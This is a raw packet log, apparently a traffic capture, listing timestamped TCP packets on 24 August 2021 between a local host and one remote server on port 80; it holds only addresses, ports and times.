Aug 24, 2021 08:46:53.653204918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.653219938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.653235912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.653279066 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.653321981 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.653453112 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.662529945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662561893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662578106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662595034 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662606955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662619114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662631989 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662645102 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662656069 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662666082 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.662676096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662693977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662694931 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.662715912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662734985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662753105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662760019 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.662769079 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662786961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662794113 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.662802935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662820101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662836075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662849903 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.662851095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662869930 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662888050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662899017 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.662904024 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662921906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662930965 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.662938118 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662954092 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.662961006 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.662971020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.663005114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.663021088 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.663022995 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.663041115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.663053989 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.663055897 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.663072109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.663089037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.663100958 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.663103104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.663136005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.663140059 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.663153887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.663166046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.663166046 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.663182974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.663199902 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.663213968 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.663217068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.663229942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.663247108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.663260937 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.663265944 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.663281918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.663291931 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.663350105 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.667349100 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.667377949 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.667395115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.667412043 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.667474031 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.667522907 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.675313950 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.675339937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.675357103 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.675373077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.675389051 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.675407887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.675446033 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.675462961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.675462008 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.675502062 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.675523043 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.676084995 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.679323912 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.685372114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685403109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685422897 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685440063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685455084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685472012 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685487986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685501099 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.685503006 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685519934 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685535908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685544968 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.685556889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685575008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685585976 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685595036 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.685599089 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685615063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685627937 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.685631037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685647011 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685657024 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.685662985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685679913 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685691118 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685703039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685705900 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.685714960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685731888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685739040 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.685748100 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685764074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685767889 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.685781002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685795069 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.685797930 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685817003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685827017 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.685833931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685851097 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685867071 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685869932 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.685883045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685895920 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.685899973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685915947 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685923100 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.685933113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685951948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685969114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.685985088 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.685985088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.686002016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.686024904 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.686028004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.686043978 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.686057091 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.686058044 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.686078072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.686088085 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.686096907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.686120033 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.686150074 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.689507961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.689534903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.689549923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.689565897 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.689594030 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.689618111 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.697554111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.697577000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.697592974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.697613001 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.697629929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.697645903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.697644949 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.697662115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.697678089 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.697683096 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.697696924 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.697705030 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.697715044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.697726011 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.697763920 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.706651926 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.708120108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708144903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708157063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708169937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708183050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708194971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708210945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708228111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708246946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708261967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708277941 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708292961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708312988 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708329916 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708344936 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708362103 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708378077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708395004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708410025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708425999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708434105 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.708451033 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708467960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708482981 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708498955 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.708498955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708504915 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.708508968 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.708515882 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708530903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708532095 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.708535910 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.708539963 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.708543062 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.708547115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708563089 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708581924 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708599091 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708614111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708579063 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.708631039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708633900 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.708638906 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.708647013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708661079 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.708662987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708679914 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708702087 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.708703041 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708724976 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708740950 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708750010 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.708755970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708755970 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.708771944 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708786964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708791971 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.708801985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.708827972 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.708869934 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.711611032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.711638927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.711656094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.711672068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.711755037 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.711781979 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.719783068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.719813108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.719830990 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.719846964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.719862938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.719877958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.719897032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.719913960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.719928026 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.719933033 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.719949007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.719981909 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.720016956 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.728754044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.728785992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.728871107 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.730813980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.730845928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.730863094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.730881929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.730899096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.730915070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.730931044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.730973959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.730979919 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.730989933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731004953 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731020927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731026888 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.731036901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731051922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731060982 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.731069088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731087923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731090069 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.731106043 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731138945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731144905 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.731153965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731167078 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.731170893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731187105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731203079 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731219053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731235027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731250048 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.731254101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731271029 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731287003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731302977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731304884 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.731318951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731331110 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.731333017 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731353998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731364965 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.731372118 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731390953 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731409073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731424093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731430054 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.731440067 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731456041 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731471062 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731482983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731494904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731496096 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.731507063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731523037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.731542110 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.731587887 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.733849049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.733881950 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.733901024 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.733918905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.733936071 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.733968019 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.733994007 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.741986990 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.742032051 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.742052078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.742069960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.742085934 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.742085934 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.742101908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.742119074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.742125988 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.742136002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.742151022 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.742152929 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.742166996 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.742192984 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.742222071 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.750991106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.751024961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.751041889 CEST	80	49715	212.224.105.79	192.168.2.7
